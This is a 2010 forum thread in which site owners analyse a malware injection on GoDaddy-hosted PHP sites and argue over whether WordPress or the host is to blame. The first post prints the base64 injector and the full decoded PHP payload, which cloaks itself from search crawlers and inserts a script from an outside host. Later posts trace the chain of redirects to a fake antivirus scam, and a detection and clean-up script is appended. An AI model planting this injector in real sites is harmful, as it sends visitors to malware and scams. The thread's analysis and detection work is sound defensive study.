GoDaddy Got Hacked Yesterday


72 replies to this topic

#1 TonyLock

TonyLock

    Neowinian Senior

  • Joined: 23-July 02

Posted 02 May 2010 - 22:02

I'm sure some of you may be aware of the situation, but as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/G...tus/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims: a friend has a site that only has her own hand-written PHP code and nothing more. My friend is super obsessive about security and knows for a fact her FTP account was not compromised; despite that, she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>


When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):
<?php /**/ eval(base64_decode("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"));?>


When you decode this, it equates to:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
    $GLOBALS['mr_no']=1; // marker so the hook is installed only once, even if several infected files are included
    if(!function_exists('mrobh')){
        if(!function_exists('gml')){
            // Returns the injected <script> tag, but hands crawlers an empty string so
            // search engines never see the injection (cloaking)
            function gml(){
                if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
                    // decodes to: <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
                    return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
                }
                return "";
            }
        }
        if(!function_exists('gzdecode')){
            // Fallback gzip decoder for PHP builds without gzdecode(): reads the FLG byte of the
            // gzip header and skips the optional FEXTRA (4), FNAME (8), FCOMMENT (16) and FHCRC (2)
            // fields to reach the raw deflate stream, so a gzip-compressed page buffer can still be edited
            function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ // $R5A9... = compressed data
                $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); // FLG byte
                $RBE4C4D037E939226F65812885A53DAD9=10; // offset past the fixed 10-byte gzip header
                $RA3D52E52A48936CDE0F5356BB08652F2=0; // never used
                if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ // FEXTRA: 2-byte length followed by the extra field
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                    $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ // FNAME: zero-terminated original file name
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ // FCOMMENT: zero-terminated comment
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ // FHCRC: 2-byte header CRC
                    $RBE4C4D037E939226F65812885A53DAD9+=2;
                }
                $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ // not gzip after all: use the buffer as-is
                    $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
                }
                return $R034AE2AB94F99CC81B389A1822DA3353;
            }
        }
        // Output-buffer callback: receives the whole rendered page just before it is sent to the browser
        function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
            Header('Content-Encoding: none'); // the page is returned uncompressed, so drop any gzip header
            $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
            if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                // insert the script tag on its own line directly before </body>
                return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
            }else{
                return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); // no </body> in the page: append it at the end
            }
        }
        ob_start('mrobh'); // every page rendered after this point passes through mrobh()
    }
}


I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.
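A detection and clean-up helper for the injector described in this post, added here as an example and not part of the original thread: it peels the eval(base64_decode()) layers, reports the traits the decoded code shows (the ob_start hook, the crawler cloaking, the </body> rewrite) and lists the script URL hidden inside the payload. The infected file it analyses is a constructed, shortened stand-in for the real payload; the regexes and indicator names are my own assumptions.

```python
import base64
import re
# The injector line that sits at the top of every infected PHP file in this thread.
INJECTOR_RE = re.compile(
    r"""<\?php\s*/\*\*/\s*eval\(base64_decode\(["']([A-Za-z0-9+/=]+)["']\)\);\s*\?>""")
B64_RE = re.compile(r"""base64_decode\(["']([A-Za-z0-9+/=]{16,})["']\)""")
SCRIPT_RE = re.compile(r"""<script[^>]*src=["']([^"']+)["'][^>]*>""", re.I)
# Traits of the decoded payload: output-buffer hook, crawler cloaking, </body> rewrite.
INDICATORS = {
    "output_buffer_hook": re.compile(r"""ob_start\(\s*['"]\w+['"]\s*\)"""),
    "crawler_cloaking": re.compile(r"HTTP_USER_AGENT.*?googlebot", re.I | re.S),
    "body_tag_injection": re.compile(r"preg_replace\(.{0,40}body", re.S),
}

def decode_payloads(source):
    """Return every base64 argument of base64_decode() found in `source`, decoded."""
    out = []
    for blob in B64_RE.findall(source):
        try:  # anything that is not valid base64 is simply skipped
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass
    return out

def analyse(source, max_depth=8):
    """Peel nested eval/base64 layers and report which injector traits are present."""
    layers, queue, depth = [], [source], 0
    while queue and depth < max_depth:  # bounded so a pathological file cannot loop forever
        decoded = [d for layer in queue for d in decode_payloads(layer)]
        layers += decoded
        queue, depth = decoded, depth + 1
    combined = "\n".join(layers)
    return {
        "infected": INJECTOR_RE.search(source) is not None,
        "indicators": sorted(k for k, rx in INDICATORS.items() if rx.search(combined)),
        "scripts_in_payload": sorted(set(SCRIPT_RE.findall(combined))),
    }

def clean(source):
    """Remove the injector line; what remains is the site's own code."""
    return INJECTOR_RE.sub("", source, count=1)

def constructed_sample():
    """Constructed infected file: a shortened stand-in for the real payload, same wrapper and script URL."""
    inner = ('function gml(){if(!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")){'
             'return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");}return "";}'
             + r"""function mrobh($b){return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$b);}"""
             + "ob_start('mrobh');")
    blob = base64.b64encode(inner.encode()).decode()
    return '<?php /**/ eval(base64_decode("%s"));?>\n<?php echo "site code"; ?>\n' % blob
```

Run analyse() over every .php file in the docroot; a file whose report says infected with all three indicators is the pattern from this thread, and clean() gives you the original file back for comparison before you restore from a known-good backup.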


#2 +Cupcakes

Cupcakes

    #cupcakey { color: hot pink }

  • Joined: 12-May 09
  • Location: Chicago

Posted 02 May 2010 - 22:10

Hosting companies always love to jump on the WordPress bandwagon as the reason for any security vulnerabilities.

http://wordpress.org...le-permissions/

#3 OP TonyLock

TonyLock

    Neowinian Senior

  • Joined: 23-July 02

Posted 02 May 2010 - 22:33

I know! My friend doesn't even use WordPress.

#4 HawkMan

HawkMan

    Neowinian Senior

  • Tech Issues Solved: 4
  • Joined: 31-August 04
  • Location: Norway
  • Phone: Noka Lumia 1020

Posted 02 May 2010 - 22:34

God Hacking

that's some serious business

#5 itzwolf

itzwolf

    Neowinian

  • Joined: 23-February 10
  • Location: Florida, The Someshine State

Posted 02 May 2010 - 22:38

Dang, first I've heard of this...

#6 +Cupcakes

Cupcakes

    #cupcakey { color: hot pink }

  • Joined: 12-May 09
  • Location: Chicago

Posted 02 May 2010 - 23:59

Yay I love that someone was so quick to jump on the bandwagon: http://www.neowin.ne...daddycom-hacked

Again, GODADDY is the one that's at fault NOT WORDPRESS. Yes, outdated WordPress installs can wreak havoc but if you read the above link in my other post, it's going to revolve around the SERVER'S LACK OF SECURITY.

#7 hotdog963al

hotdog963al

    Meow

  • Joined: 28-November 04
  • Location: Cambridge, UK

Posted 03 May 2010 - 00:30

Yay I love that someone was so quick to jump on the bandwagon: http://www.neowin.ne...daddycom-hacked

That's extremely annoying to see on the front page. :pinch:

#8 OP TonyLock

TonyLock

    Neowinian Senior

  • Joined: 23-July 02

Posted 03 May 2010 - 00:41

This absolutely needs to be on the front page. However, it should be stated that it absolutely was not the fault of WordPress as claimed by GoDaddy.
No software should be blamed for the incompetency of a hosting company.
It was not a weak password issue, or an FTP key logger as GoDaddy just told my friend.
It was GoDaddy's lack of adequate security.
Perhaps GoDaddy has some legal issues here and so not to get their butts sued, they blame some software that's not even on their servers.

#9 vetAndrew Lyle

Andrew Lyle

    Don't Panic!

  • Joined: 15-December 03
  • Location: Toronto, Ontario
  • OS: Windows 7 SP1

Posted 03 May 2010 - 01:04

That's extremely annoying to see on the front page. :pinch:

You have to read:
www.twitter.com/GoDaddy and read all the complaints
and
http://community.god...it/?isc=smtwsup

GoDaddy understands it's usually WordPress or weak FTP passwords. With the amount of reports, this appears to be WordPress on GoDaddy servers.

#10 Singh400

Singh400

    Neowinian Senior

  • Joined: 02-February 10

Posted 03 May 2010 - 01:06

Any coding gods tell us what the quoted codes do? Out of sheer interest...

#11 vetAndrew Lyle

Andrew Lyle

    Don't Panic!

  • Joined: 15-December 03
  • Location: Toronto, Ontario
  • OS: Windows 7 SP1

Posted 03 May 2010 - 01:13

Here is another report:
http://wordpress.org...rt/topic/394255

Just google:

<script src="http://kdjkfjskdfjls....php"></script>

I have to be clear, nobody knows 100% what the cause is, but WordPress owners appear to be getting hacked, aside from the odd post here on Neowin, claiming that friends got hacked, without wordpress installed.

But we can all safely say that GoDaddy is the host of all these compromised websites, correct?

#12 +Cupcakes

Cupcakes

    #cupcakey { color: hot pink }

  • Joined: 12-May 09
  • Location: Chicago

Posted 03 May 2010 - 01:52

A server-wide occurrence is the fault of GoDaddy and not WordPress (as expressed by seeing this issue with non-WordPress accounts on affected GoDaddy servers.) Not only that but people also fail to bring up any WordPress plugins that they're using. Those can be the culprit and not even WordPress itself.

Andrew, even in the Wordpress support link, you can also see that another user chimes in that it's not Wordpress-specific: http://blog.sucuri.n...tes-hacked.html

Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.

WordPress, like all other web applications, must store database connection info in clear text. Encrypting credentials doesn’t matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system — like they appeared to have in this case — it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

I’m not even going to link any of the articles because they have so many inaccuracies you become stupider by reading them.

If you’re a web host and you turn a bad file permissions story into a WordPress story, you’re doing something wrong.

P.S. Network Solutions, it’s “WordPress” not “Word Press.”



#13 RoomKid

RoomKid

    Banned

  • Joined: 12-October 09
  • Location: on my chair in front of the computer

Posted 03 May 2010 - 02:22

I've been hacked once too, there was this file encoded in Base64. To access the file, you need a password. So I opened that file in cPanel, and found out the password. When I got access, I was amazed. It was like a filemanager, I can edit/delete/create new files. There were hacking tools too. I deleted it, changed my passwords and everything else to make sure that I was safe.

#14 bytes2000

bytes2000

    Neowinian

  • Joined: 20-June 04

Posted 03 May 2010 - 03:26

I don't really understand what this code exactly does. Can any PHP code experts decipher it?



I have further checked the script via: http://web-sniffer.net/ and if you are not the Google Bot or YahooBot...
it redirects to: http://www4.suitcase...smYlGibZZqXlw==
It creates 7 cookies:

HTTP Response Header
Name Value Delim
Status: HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 03 May 2010 02:58:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.12
Set-Cookie: cid=1; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: uid=2045; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: bid=b_Unknown; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: ls=107; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: pid=3; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: pid_3=1; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: ls_3_107=1; expires=Tue, 04-May-2010 02:58:33 GMT


And then it redirects you via HTTP 302 code to: http://www1.safetypc...3qqh9qilnFxbXA=

and then it finally redirects you to a page with the following content:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta http-equiv="Content-Language" content="en"/><meta http-equiv="Cache-control" content="Public"/><title>Security Threat Analysis</title><link rel="icon" href="http://www.google.com/favicon.ico"/><link rel="SHORTCUT ICON" href="http://www.google.com/favicon.ico"/>
  
  
  <style type="text/css" media="screen">
    #loading {
      height:auto;
      left:45%;
      padding:2px;
      position:absolute;
      top:40%;
      z-index:20001;
    }
    #loading a {
      color:#225588;
    }
    #loading .loading-indicator {
      -x-system-font:none;
      background:white none repeat scroll 0 0;
      color:#444444;
      font-family:tahoma,arial,helvetica;
      font-size:13px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:bold;
      height:auto;
      line-height:normal;
      margin:0;
      padding:10px;
    }
    #loading-msg {
      -x-system-font:none;
      font-family:arial,tahoma,sans-serif;
      font-size:10px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:normal;
      line-height:normal;
    }
  </style></head><body>
  <div id="loading" style="display:block"><div class="loading-indicator"><img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="Images/loading.gif"/><br/><span id="loading-msg">Initializing process.</span></div></div>
<script type="text/javascript" src="107a447c72270a52ae79e796c983523e3a563008911.js"></script>
</body></html>

Good! My Symantec Endpoint antivirus blocked something and I cannot access: www1.safetypcwork5.net so I will continue investigating via web-sniffer

That page, shows a loading image and loads the following javascript code: http://www1.safetypc...e3a563008911.js

I did not post the whole code since it would detect a virus in this thread.
Basically it opens fake system alerts like the following:

["To prevent damage to your computer, use CANCEL.","C"],["Your system is at risk of crash. Press CANCEL to prevent it.","C"],["Your system has been damaged due to recent virus attack. Press 'OK' to to fix it.","O"],["To improve performance of your PC press 'OK'.","O"],["Your PC is working slowly. Press 'OK' to check it.","O"]


I did not further check the complex javascript of this, but it is 1000% Malware... and I think this was caused by a Worm or maybe a virus exploiting unpatched WP installs and not really brute forcing for weak passwords, because I think brute forcing is used mainly when they set your site as the target, but we cannot tell if that worm affected the WP install, so it's better to reinstall and continue using (if not already) safe passwords.

#15 GoDaddy

GoDaddy

    Neowinian

  • Joined: 03-May 10

Posted 03 May 2010 - 03:38

TonyLock and All,

I work on Go Daddy's Social Media Team and we're working with our Security Operations Center to locate examples of non-WordPress sites that have been compromised. If you're comfortable with sharing example domains, please feel free to PM them to me.

Please know that we're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK. As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware that were not WordPress blogs have the commonality that an outdated version of WordPress is either powering part of the site or that it is not in use, but is still present on the hosting plan. Additionally, we have heard reports of the compromise occurring on other hosting providers.

Again, we are actively and aggressively working to identify the cause and we've published a means to correct it: http://fwd4.me/MFK.

^Salem